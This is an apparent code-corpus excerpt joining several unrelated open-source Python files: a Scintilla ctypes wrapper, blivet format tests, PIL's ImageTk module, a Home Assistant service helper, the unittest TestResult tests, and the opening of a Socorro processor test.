_fields_= (\
('cpMin', c_long),
('cpMax', c_long),
('lpstrText', c_char_p),
('cpMinText', c_long),
('cpMaxText', c_long),
)
class SciCall:
def __init__(self, fn, ptr, msg, stringResult=False):
self._fn = fn
self._ptr = ptr
self._msg = msg
self._stringResult = stringResult
def __call__(self, w=0, l=0):
ww = ctypes.cast(w, c_char_p)
if self._stringResult:
lengthBytes = self._fn(self._ptr, self._msg, ww, None)
if lengthBytes == 0:
return bytearray()
result = (ctypes.c_byte * lengthBytes)(0)
lengthBytes2 = self._fn(self._ptr, self._msg, ww, ctypes.cast(result, c_char_p))
assert lengthBytes == lengthBytes2
return bytearray(result)[:lengthBytes]
else:
ll = ctypes.cast(l, c_char_p)
return self._fn(self._ptr, self._msg, ww, ll)
sciFX = ctypes.CFUNCTYPE(c_long, c_char_p, c_int, c_char_p, c_char_p)
class ScintillaCallable:
def __init__(self, face, scifn, sciptr):
self.__dict__["face"] = face
self.__dict__["used"] = set()
self.__dict__["all"] = set()
# The k member is for accessing constants as a dictionary
self.__dict__["k"] = {}
for f in face.features:
self.all.add(f)
if face.features[f]["FeatureType"] == "val":
self.k[f] = int(self.face.features[f]["Value"], 0)
elif face.features[f]["FeatureType"] == "evt":
self.k["SCN_"+f] = int(self.face.features[f]["Value"], 0)
scifn = sciFX(scifn)
self.__dict__["_scifn"] = scifn
self.__dict__["_sciptr"] = sciptr
def __getattr__(self, name):
if name in self.face.features:
self.used.add(name)
feature = self.face.features[name]
value = int(feature["Value"], 0)
#~ print("Feature", name, feature)
if feature["FeatureType"] == "val":
self.__dict__[name] = value
return value
else:
if feature["Param2Type"] == "stringresult" and \
name not in ["GetText", "GetLine", "GetCurLine"]:
return SciCall(self._scifn, self._sciptr, value, True)
else:
return SciCall(self._scifn, self._sciptr, value)
elif ("Get" + name) in self.face.features:
self.used.add("Get" + name)
feature = self.face.features["Get" + name]
value = int(feature["Value"], 0)
if feature["FeatureType"] == "get" and \
not name.startswith("Get") and \
not feature["Param1Type"] and \
not feature["Param2Type"] and \
feature["ReturnType"] in ["bool", "int", "position"]:
#~ print("property", feature)
return self._scifn(self._sciptr, value, None, None)
elif name.startswith("SCN_") and name in self.k:
self.used.add(name)
feature = self.face.features[name[4:]]
value = int(feature["Value"], 0)
#~ print("Feature", name, feature)
if feature["FeatureType"] == "val":
return value
raise AttributeError(name)
def __setattr__(self, name, val):
if ("Set" + name) in self.face.features:
self.used.add("Set" + name)
feature = self.face.features["Set" + name]
value = int(feature["Value"], 0)
#~ print("setproperty", feature)
if feature["FeatureType"] == "set" and not name.startswith("Set"):
if feature["Param1Type"] in ["bool", "int", "position"]:
return self._scifn(self._sciptr, value, c_char_p(val), None)
elif feature["Param2Type"] in ["string"]:
return self._scifn(self._sciptr, value, None, c_char_p(val))
raise AttributeError(name)
raise AttributeError(name)
def getvalue(self, name):
if name in self.face.features:
feature = self.face.features[name]
if feature["FeatureType"] != "evt":
try:
return int(feature["Value"], 0)
except ValueError:
return -1
return -1
def ByteRange(self, start, end):
tr = TEXTRANGE()
tr.cpMin = start
tr.cpMax = end
length = end - start
tr.lpstrText = ctypes.create_string_buffer(length + 1)
self.GetTextRange(0, ctypes.byref(tr))
text = tr.lpstrText[:length]
text += b"\0" * (length - len(text))
return text
def StyledTextRange(self, start, end):
tr = TEXTRANGE()
tr.cpMin = start
tr.cpMax = end
length = 2 * (end - start)
tr.lpstrText = ctypes.create_string_buffer(length + 2)
self.GetStyledText(0, ctypes.byref(tr))
styledText = tr.lpstrText[:length]
styledText += b"\0" * (length - len(styledText))
return styledText
def FindBytes(self, start, end, s, flags):
ft = FINDTEXT()
ft.cpMin = start
ft.cpMax = end
ft.lpstrText = s
ft.cpMinText = 0
ft.cpMaxText = 0
pos = self.FindText(flags, ctypes.byref(ft))
#~ print(start, end, ft.cpMinText, ft.cpMaxText)
return pos
def Contents(self):
return self.ByteRange(0, self.Length)
def SetContents(self, s):
self.TargetStart = 0
self.TargetEnd = self.Length
self.ReplaceTarget(len(s), s)
| bsd-2-clause |
rvykydal/blivet | tests/formats_test/device_test.py | 6 | 3185 | import unittest
import blivet
class DeviceFormatTestCase(unittest.TestCase):
def test_formats(self):
absolute_path = "/abs/path"
host_path = "host:path"
garbage = "abc#<def>"
for fclass in blivet.formats.device_formats.values():
an_fs = fclass()
# all formats accept None for device
try:
an_fs.device = None
except ValueError:
raise self.failureException("ValueError raised")
# NoDevFS accepts anything
if isinstance(an_fs, blivet.formats.fs.NoDevFS):
try:
an_fs.device = absolute_path
an_fs.device = host_path
an_fs.device = garbage
an_fs.device = ""
except ValueError:
raise self.failureException("ValueError raised")
elif isinstance(an_fs, blivet.formats.fs.NFS):
try:
an_fs.device = host_path
except ValueError:
raise self.failureException("ValueError raised")
with self.assertRaises(ValueError):
an_fs.device = absolute_path
with self.assertRaises(ValueError):
an_fs.device = garbage
with self.assertRaises(ValueError):
an_fs.device = ""
else:
try:
an_fs.device = absolute_path
an_fs.device = ""
except ValueError:
raise self.failureException("ValueError raised")
with self.assertRaises(ValueError):
an_fs.device = host_path
with self.assertRaises(ValueError):
an_fs.device = garbage
class DeviceValueTestCase(unittest.TestCase):
def test_value(self):
for fclass in blivet.formats.device_formats.values():
an_fs = fclass()
if isinstance(an_fs, blivet.formats.fs.TmpFS):
# type == device == _type == _device == "tmpfs" always
vals = [an_fs.type, an_fs.device, an_fs._type, an_fs._device]
self.assertTrue(all(x == "tmpfs" for x in vals))
an_fs.device = "new"
self.assertTrue(all(x == "tmpfs" for x in vals))
elif isinstance(an_fs, blivet.formats.fs.NoDevFS):
# type == device == _type == _device
vals = [an_fs.type, an_fs.device, an_fs._device]
self.assertTrue(all(x == an_fs._type for x in vals))
an_fs.device = "new"
# _type is unchanged, but type, device, _device have new value
self.assertNotEqual(an_fs._type, "new")
vals = [an_fs.type, an_fs.device, an_fs._device]
self.assertTrue(all(x == "new" for x in vals))
else:
# other formats are straightforward
typ = an_fs.type
an_fs.device = "/abc:/def"
self.assertEqual(an_fs.type, typ)
self.assertEqual(an_fs.device, "/abc:/def")
| lgpl-2.1 |
WillisXChen/django-oscar | oscar/lib/python2.7/site-packages/PIL/ImageTk.py | 46 | 9108 | #
# The Python Imaging Library.
# $Id$
#
# a Tk display interface
#
# History:
# 96-04-08 fl Created
# 96-09-06 fl Added getimage method
# 96-11-01 fl Rewritten, removed image attribute and crop method
# 97-05-09 fl Use PyImagingPaste method instead of image type
# 97-05-12 fl Minor tweaks to match the IFUNC95 interface
# 97-05-17 fl Support the "pilbitmap" booster patch
# 97-06-05 fl Added file= and data= argument to image constructors
# 98-03-09 fl Added width and height methods to Image classes
# 98-07-02 fl Use default mode for "P" images without palette attribute
# 98-07-02 fl Explicitly destroy Tkinter image objects
# 99-07-24 fl Support multiple Tk interpreters (from Greg Couch)
# 99-07-26 fl Automatically hook into Tkinter (if possible)
# 99-08-15 fl Hook uses _imagingtk instead of _imaging
#
# Copyright (c) 1997-1999 by Secret Labs AB
# Copyright (c) 1996-1997 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
try:
import tkinter
except ImportError:
import Tkinter
tkinter = Tkinter
del Tkinter
from PIL import Image
# --------------------------------------------------------------------
# Check for Tkinter interface hooks
_pilbitmap_ok = None
def _pilbitmap_check():
global _pilbitmap_ok
if _pilbitmap_ok is None:
try:
im = Image.new("1", (1, 1))
tkinter.BitmapImage(data="PIL:%d" % im.im.id)
_pilbitmap_ok = 1
except tkinter.TclError:
_pilbitmap_ok = 0
return _pilbitmap_ok
# --------------------------------------------------------------------
# PhotoImage
class PhotoImage(object):
"""
A Tkinter-compatible photo image. This can be used
everywhere Tkinter expects an image object. If the image is an RGBA
image, pixels having alpha 0 are treated as transparent.
The constructor takes either a PIL image, or a mode and a size.
Alternatively, you can use the **file** or **data** options to initialize
the photo image object.
:param image: Either a PIL image, or a mode string. If a mode string is
used, a size must also be given.
:param size: If the first argument is a mode string, this defines the size
of the image.
:keyword file: A filename to load the image from (using
``Image.open(file)``).
:keyword data: An 8-bit string containing image data (as loaded from an
image file).
"""
def __init__(self, image=None, size=None, **kw):
# Tk compatibility: file or data
if image is None:
if "file" in kw:
image = Image.open(kw["file"])
del kw["file"]
elif "data" in kw:
from io import BytesIO
image = Image.open(BytesIO(kw["data"]))
del kw["data"]
if hasattr(image, "mode") and hasattr(image, "size"):
# got an image instead of a mode
mode = image.mode
if mode == "P":
# palette mapped data
image.load()
try:
mode = image.palette.mode
except AttributeError:
mode = "RGB" # default
size = image.size
kw["width"], kw["height"] = size
else:
mode = image
image = None
if mode not in ["1", "L", "RGB", "RGBA"]:
mode = Image.getmodebase(mode)
self.__mode = mode
self.__size = size
self.__photo = tkinter.PhotoImage(**kw)
self.tk = self.__photo.tk
if image:
self.paste(image)
def __del__(self):
name = self.__photo.name
self.__photo.name = None
try:
self.__photo.tk.call("image", "delete", name)
except:
pass # ignore internal errors
def __str__(self):
"""
Get the Tkinter photo image identifier. This method is automatically
called by Tkinter whenever a PhotoImage object is passed to a Tkinter
method.
:return: A Tkinter photo image identifier (a string).
"""
return str(self.__photo)
def width(self):
"""
Get the width of the image.
:return: The width, in pixels.
"""
return self.__size[0]
def height(self):
"""
Get the height of the image.
:return: The height, in pixels.
"""
return self.__size[1]
def paste(self, im, box=None):
"""
Paste a PIL image into the photo image. Note that this can
be very slow if the photo image is displayed.
:param im: A PIL image. The size must match the target region. If the
mode does not match, the image is converted to the mode of
the bitmap image.
:param box: A 4-tuple defining the left, upper, right, and lower pixel
coordinate. If None is given instead of a tuple, all of
the image is assumed.
"""
# convert to blittable
im.load()
image = im.im
if image.isblock() and im.mode == self.__mode:
block = image
else:
block = image.new_block(self.__mode, im.size)
image.convert2(block, image) # convert directly between buffers
tk = self.__photo.tk
try:
tk.call("PyImagingPhoto", self.__photo, block.id)
except tkinter.TclError:
# activate Tkinter hook
try:
from PIL import _imagingtk
try:
_imagingtk.tkinit(tk.interpaddr(), 1)
except AttributeError:
_imagingtk.tkinit(id(tk), 0)
tk.call("PyImagingPhoto", self.__photo, block.id)
except (ImportError, AttributeError, tkinter.TclError):
raise # configuration problem; cannot attach to Tkinter
# --------------------------------------------------------------------
# BitmapImage
class BitmapImage(object):
"""
A Tkinter-compatible bitmap image. This can be used everywhere Tkinter
expects an image object.
The given image must have mode "1". Pixels having value 0 are treated as
transparent. Options, if any, are passed on to Tkinter. The most commonly
used option is **foreground**, which is used to specify the color for the
non-transparent parts. See the Tkinter documentation for information on
how to specify colours.
:param image: A PIL image.
"""
def __init__(self, image=None, **kw):
# Tk compatibility: file or data
if image is None:
if "file" in kw:
image = Image.open(kw["file"])
del kw["file"]
elif "data" in kw:
from io import BytesIO
image = Image.open(BytesIO(kw["data"]))
del kw["data"]
self.__mode = image.mode
self.__size = image.size
if _pilbitmap_check():
# fast way (requires the pilbitmap booster patch)
image.load()
kw["data"] = "PIL:%d" % image.im.id
self.__im = image # must keep a reference
else:
# slow but safe way
kw["data"] = image.tobitmap()
self.__photo = tkinter.BitmapImage(**kw)
def __del__(self):
name = self.__photo.name
self.__photo.name = None
try:
self.__photo.tk.call("image", "delete", name)
except:
pass # ignore internal errors
def width(self):
"""
Get the width of the image.
:return: The width, in pixels.
"""
return self.__size[0]
def height(self):
"""
Get the height of the image.
:return: The height, in pixels.
"""
return self.__size[1]
def __str__(self):
"""
Get the Tkinter bitmap image identifier. This method is automatically
called by Tkinter whenever a BitmapImage object is passed to a Tkinter
method.
:return: A Tkinter bitmap image identifier (a string).
"""
return str(self.__photo)
def getimage(photo):
"""Copies the contents of a PhotoImage to a PIL image memory."""
photo.tk.call("PyImagingPhotoGet", photo)
# --------------------------------------------------------------------
# Helper for the Image.show method.
def _show(image, title):
class UI(tkinter.Label):
def __init__(self, master, im):
if im.mode == "1":
self.image = BitmapImage(im, foreground="white", master=master)
else:
self.image = PhotoImage(im, master=master)
tkinter.Label.__init__(self, master, image=self.image,
bg="black", bd=0)
if not tkinter._default_root:
raise IOError("tkinter not initialized")
top = tkinter.Toplevel()
if title:
top.title(title)
UI(top, image).pack()
| bsd-3-clause |
jawilson/home-assistant | homeassistant/helpers/service.py | 1 | 3578 | """Service calling related helpers."""
import functools
import logging
# pylint: disable=unused-import
from typing import Optional # NOQA
import voluptuous as vol
from homeassistant.const import ATTR_ENTITY_ID
from homeassistant.core import HomeAssistant # NOQA
from homeassistant.exceptions import TemplateError
from homeassistant.loader import get_component
import homeassistant.helpers.config_validation as cv
HASS = None # type: Optional[HomeAssistant]
CONF_SERVICE = 'service'
CONF_SERVICE_TEMPLATE = 'service_template'
CONF_SERVICE_ENTITY_ID = 'entity_id'
CONF_SERVICE_DATA = 'data'
CONF_SERVICE_DATA_TEMPLATE = 'data_template'
_LOGGER = logging.getLogger(__name__)
def service(domain, service_name):
"""Decorator factory to register a service."""
def register_service_decorator(action):
"""Decorator to register a service."""
HASS.services.register(domain, service_name,
functools.partial(action, HASS))
return action
return register_service_decorator
def call_from_config(hass, config, blocking=False, variables=None,
validate_config=True):
"""Call a service based on a config hash."""
if validate_config:
try:
config = cv.SERVICE_SCHEMA(config)
except vol.Invalid as ex:
_LOGGER.error("Invalid config for calling service: %s", ex)
return
if CONF_SERVICE in config:
domain_service = config[CONF_SERVICE]
else:
try:
config[CONF_SERVICE_TEMPLATE].hass = hass
domain_service = config[CONF_SERVICE_TEMPLATE].render(variables)
domain_service = cv.service(domain_service)
except TemplateError as ex:
_LOGGER.error('Error rendering service name template: %s', ex)
return
except vol.Invalid as ex:
_LOGGER.error('Template rendered invalid service: %s',
domain_service)
return
domain, service_name = domain_service.split('.', 1)
service_data = dict(config.get(CONF_SERVICE_DATA, {}))
def _data_template_creator(value):
"""Recursive template creator helper function."""
if isinstance(value, list):
for idx, element in enumerate(value):
value[idx] = _data_template_creator(element)
return value
if isinstance(value, dict):
for key, element in value.items():
value[key] = _data_template_creator(element)
return value
value.hass = hass
return value.render(variables)
if CONF_SERVICE_DATA_TEMPLATE in config:
for key, value in config[CONF_SERVICE_DATA_TEMPLATE].items():
service_data[key] = _data_template_creator(value)
if CONF_SERVICE_ENTITY_ID in config:
service_data[ATTR_ENTITY_ID] = config[CONF_SERVICE_ENTITY_ID]
hass.services.call(domain, service_name, service_data, blocking)
def extract_entity_ids(hass, service_call):
"""Helper method to extract a list of entity ids from a service call.
Will convert group entity ids to the entity ids it represents.
"""
if not (service_call.data and ATTR_ENTITY_ID in service_call.data):
return []
group = get_component('group')
# Entity ID attr can be a list or a string
service_ent_id = service_call.data[ATTR_ENTITY_ID]
if isinstance(service_ent_id, str):
return group.expand_entity_ids(hass, [service_ent_id])
return [ent_id for ent_id in group.expand_entity_ids(hass, service_ent_id)]
| mit |
40023255/2015cd_0505 | static/Brython3.1.1-20150328-091302/Lib/unittest/test/test_result.py | 788 | 19069 | import io
import sys
import textwrap
from test import support
import traceback
import unittest
class Test_TestResult(unittest.TestCase):
# Note: there are not separate tests for TestResult.wasSuccessful(),
# TestResult.errors, TestResult.failures, TestResult.testsRun or
# TestResult.shouldStop because these only have meaning in terms of
# other TestResult methods.
#
# Accordingly, tests for the aforenamed attributes are incorporated
# in with the tests for the defining methods.
################################################################
def test_init(self):
result = unittest.TestResult()
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 0)
self.assertEqual(result.shouldStop, False)
self.assertIsNone(result._stdout_buffer)
self.assertIsNone(result._stderr_buffer)
# "This method can be called to signal that the set of tests being
# run should be aborted by setting the TestResult's shouldStop
# attribute to True."
def test_stop(self):
result = unittest.TestResult()
result.stop()
self.assertEqual(result.shouldStop, True)
# "Called when the test case test is about to be run. The default
# implementation simply increments the instance's testsRun counter."
def test_startTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# "Called after the test case test has been executed, regardless of
# the outcome. The default implementation does nothing."
def test_stopTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# Same tests as above; make sure nothing has changed
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "Called before and after tests are run. The default implementation does nothing."
def test_startTestRun_stopTestRun(self):
result = unittest.TestResult()
result.startTestRun()
result.stopTestRun()
# "addSuccess(test)"
# ...
# "Called when the test case test succeeds"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addSuccess(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "addFailure(test, err)"
# ...
# "Called when the test case test signals a failure. err is a tuple of
# the form returned by sys.exc_info(): (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addFailure(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
test.fail("foo")
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addFailure(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.failures[0]
self.assertTrue(test_case is test)
self.assertIsInstance(formatted_exc, str)
# "addError(test, err)"
# ...
# "Called when the test case test raises an unexpected exception err
# is a tuple of the form returned by sys.exc_info():
# (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addError(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
raise TypeError()
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addError(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertTrue(test_case is test)
self.assertIsInstance(formatted_exc, str)
def testGetDescriptionWithoutDocstring(self):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
'testGetDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult)')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
def testStackFrameTrimming(self):
class Frame(object):
class tb_frame(object):
f_globals = {}
result = unittest.TestResult()
self.assertFalse(result._is_relevant_tb_level(Frame))
Frame.tb_frame.f_globals['__unittest'] = True
self.assertTrue(result._is_relevant_tb_level(Frame))
def testFailFast(self):
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addError(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addFailure(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addUnexpectedSuccess(None)
self.assertTrue(result.shouldStop)
def testFailFastSetByRunner(self):
runner = unittest.TextTestRunner(stream=io.StringIO(), failfast=True)
def test(result):
self.assertTrue(result.failfast)
result = runner.run(test)
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
'__init__'):
del classDict[m]
def __init__(self, stream=None, descriptions=None, verbosity=None):
self.failures = []
self.errors = []
self.testsRun = 0
self.shouldStop = False
self.buffer = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
class Test_OldTestResult(unittest.TestCase):
def assertOldResultWarning(self, test, failures):
with support.check_warnings(("TestResult has no add.+ method,",
RuntimeWarning)):
result = OldResult()
test.run(result)
self.assertEqual(len(result.failures), failures)
def testOldTestResult(self):
class Test(unittest.TestCase):
def testSkip(self):
self.skipTest('foobar')
@unittest.expectedFailure
def testExpectedFail(self):
raise TypeError
@unittest.expectedFailure
def testUnexpectedSuccess(self):
pass
for test_name, should_pass in (('testSkip', True),
('testExpectedFail', True),
('testUnexpectedSuccess', False)):
test = Test(test_name)
self.assertOldResultWarning(test, int(not should_pass))
def testOldTestTesultSetup(self):
class Test(unittest.TestCase):
def setUp(self):
self.skipTest('no reason')
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldTestResultClass(self):
@unittest.skip('no reason')
class Test(unittest.TestCase):
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldResultWithRunner(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
runner = unittest.TextTestRunner(resultclass=OldResult,
stream=io.StringIO())
# This will raise an exception if TextTestRunner can't handle old
# test result objects
runner.run(Test('testFoo'))
class MockTraceback(object):
@staticmethod
def format_exception(*_):
return ['A traceback']
def restore_traceback():
unittest.result.traceback = traceback
class TestOutputBuffering(unittest.TestCase):
def setUp(self):
self._real_out = sys.stdout
self._real_err = sys.stderr
def tearDown(self):
sys.stdout = self._real_out
sys.stderr = self._real_err
def testBufferOutputOff(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
def testBufferOutputStartTestAddSuccess(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
result.buffer = True
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIsNot(real_out, sys.stdout)
self.assertIsNot(real_err, sys.stderr)
self.assertIsInstance(sys.stdout, io.StringIO)
self.assertIsInstance(sys.stderr, io.StringIO)
self.assertIsNot(sys.stdout, sys.stderr)
out_stream = sys.stdout
err_stream = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo')
print('bar', file=sys.stderr)
self.assertEqual(out_stream.getvalue(), 'foo\n')
self.assertEqual(err_stream.getvalue(), 'bar\n')
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
result.addSuccess(self)
result.stopTest(self)
self.assertIs(sys.stdout, result._original_stdout)
self.assertIs(sys.stderr, result._original_stderr)
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
self.assertEqual(out_stream.getvalue(), '')
self.assertEqual(err_stream.getvalue(), '')
def getStartedResult(self):
result = unittest.TestResult()
result.buffer = True
result.startTest(self)
return result
def testBufferOutputAddErrorOrFailure(self):
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
for message_attr, add_attr, include_error in [
('errors', 'addError', True),
('failures', 'addFailure', False),
('errors', 'addError', True),
('failures', 'addFailure', False)
]:
result = self.getStartedResult()
buffered_out = sys.stdout
buffered_err = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo', file=sys.stdout)
if include_error:
print('bar', file=sys.stderr)
addFunction = getattr(result, add_attr)
addFunction(self, (None, None, None))
result.stopTest(self)
result_list = getattr(result, message_attr)
self.assertEqual(len(result_list), 1)
test, message = result_list[0]
expectedOutMessage = textwrap.dedent("""
Stdout:
foo
""")
expectedErrMessage = ''
if include_error:
expectedErrMessage = textwrap.dedent("""
Stderr:
bar
""")
expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)
self.assertIs(test, self)
self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
self.assertMultiLineEqual(message, expectedFullMessage)
def testBufferSetupClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownClass(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def tearDownClass(cls):
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferSetUpModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
def testBufferTearDownModule(self):
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def tearDownModule():
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
self.assertEqual(len(result.errors), 1)
if __name__ == '__main__':
unittest.main()
| agpl-3.0 |
cliqz/socorro | socorro/unittest/processor/test_legacy_new_crash_source.py | 13 | 10751 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import mock
from datetime import timedelta
from nose.tools import eq_
from configman.dotdict import DotDict
from socorro.processor.legacy_new_crash_source import (
LegacyNewCrashSource,
)
from socorro.external.postgresql.dbapi2_util import (
execute_no_results,
execute_query_fetchall,
)
from socorro.unittest.testbase import TestCase
def sequencer(*args):
active_iter = iter(args)
def foo(*args, **kwargs):
try:
value = active_iter.next()
except StopIteration:
raise Exception('out of values')
if isinstance(value, Exception):
raise value
return value
return foo
class TestLegacyNewCrashSource(TestCase):
def test_legacy_new_crash_source_basics(self):
m_transaction_executor_class = mock.Mock()
config = DotDict()
database = mock.Mock()
config.database_class = mock.Mock(return_value=database)
config.transaction_executor_class = m_transaction_executor_class
config.batchJobLimit = 10
LegacyNewCrashSource(config, processor_name='dwight-1234')
eq_(m_transaction_executor_class.call_count, 1)
m_transaction_executor_class.assert_called_with(
config,
database,
None)
def test_incoming_job_stream_normal(self):
config = DotDict()
config.database_class = mock.Mock()
config.transaction_executor_class = mock.Mock()
config.batchJobLimit = 10
config.logger = mock.Mock()
class StubbedIterators(LegacyNewCrashSource):
def _priority_jobs_iter(self):
while True:
yield None
def _normal_jobs_iter(self):
values = [
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
(4, '4567', 1),
(5, '5678', 1),
]
for x in values:
yield x
new_crash_source = StubbedIterators(config,
processor_name='sherman1234')
expected = ('1234',
'2345',
'3456',
'4567',
'5678',
)
for x, y in zip(new_crash_source, expected):
eq_(x, ((y,), {}))
eq_(len([x for x in new_crash_source]), 5)
def test_incoming_job_stream_priority(self):
config = DotDict()
config.database_class = mock.Mock()
